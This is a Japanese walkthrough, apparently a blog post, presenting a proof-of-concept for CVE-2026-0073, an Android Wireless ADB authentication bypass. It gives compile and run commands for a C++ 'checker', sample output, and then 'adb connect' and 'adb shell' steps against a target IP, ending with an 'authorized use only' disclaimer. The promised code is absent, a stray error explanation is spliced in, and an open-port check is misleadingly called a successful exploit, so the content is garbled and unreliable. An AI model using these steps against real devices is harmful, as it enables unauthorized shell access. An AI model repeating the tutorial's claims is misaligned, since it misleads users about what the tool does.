
CVE-2026-0073
CVE-2026-0073 は、Android の Wireless ADB(adbd デーモン)における重大な認証バイパス脆弱性です。
同じネットワーク上の攻撃者は、相互 TLS 認証をバイパスし、ユーザーの承認や事前ペアリングなしでデバイスに接続できます。
| 項目 | 詳細 |
|---|---|
| CVE ID | CVE-2026-0073 |
| 深刻度 | Critical |
| CVSSスコア | 8.8 |
| 影響を受けるコンポーネント | adbd (Android Debug Bridge) - TLS ハンドラ |
| 種別 | 認証バイパス |
| 影響 | リモートシェルアクセス (shell ユーザー) |
| パッチ適用済み | 2026年5月 Android セキュリティ情報 |
修正済み: セキュリティパッチレベル 2026-05-01 以降。
shell ユーザーとしてのコマンド実行が可能adbd_tls_verify_cert() のロジック欠陥を悪用することで機能このエラーは、CVE-2026-0073-Checker.cpp ファイルがまだ存在しないために発生します。
nano CVE-2026-0073-Checker.cpp
以下の完全なコードをコピーしてエディタに貼り付けます:
保存して終了します(Ctrl + X → Y → Enter)
再コンパイルします:
g++ -o CVE-2026-0073 CVE-2026-0073-Checker.cpp -lssl -lcrypto -Wall -O2
./CVE-2026-0073 192.168.1.105
以下は、C++ プログラムが脆弱な Android デバイス上で正常に動作した場合に表示される内容です:
╔══════════════════════════════════════════════════════════════╗
║ CVE-2026-0073 PoC Checker ║
║ Android Wireless ADB Authentication Bypass ║
╚══════════════════════════════════════════════════════════════╝
Target : 192.168.1.105
[*] Checking 192.168.1.105:5555 → OPEN
[!] Wireless ADB Port is Open!
[!] High chance of being vulnerable to CVE-2026-0073
Next Steps:
1. adb connect 192.168.1.105:5555
2. adb shell
OPEN → ADB ポートがリッスン中です。以下のコマンドを実行します:
adb connect 192.168.1.105:5555
次のように表示された場合:
connected to 192.168.1.105:5555
次に入力します:
adb shell
デバイス内部に入れるはずです:
pixel8:/ $
これで完全なエクスプロイト成功です。
この PoC は教育目的および許可されたテストのみを対象としています。
所有しているデバイス、またはテストする明示的な許可を得たデバイスでのみ使用できます。 無断使用は違法であり、固く禁止されています。
自己責任で使用してください。作者はいかなる損害や法的結果についても責任を負いません。
🎯 注意して作成 — 許可されたデバイスでのみ使用してください。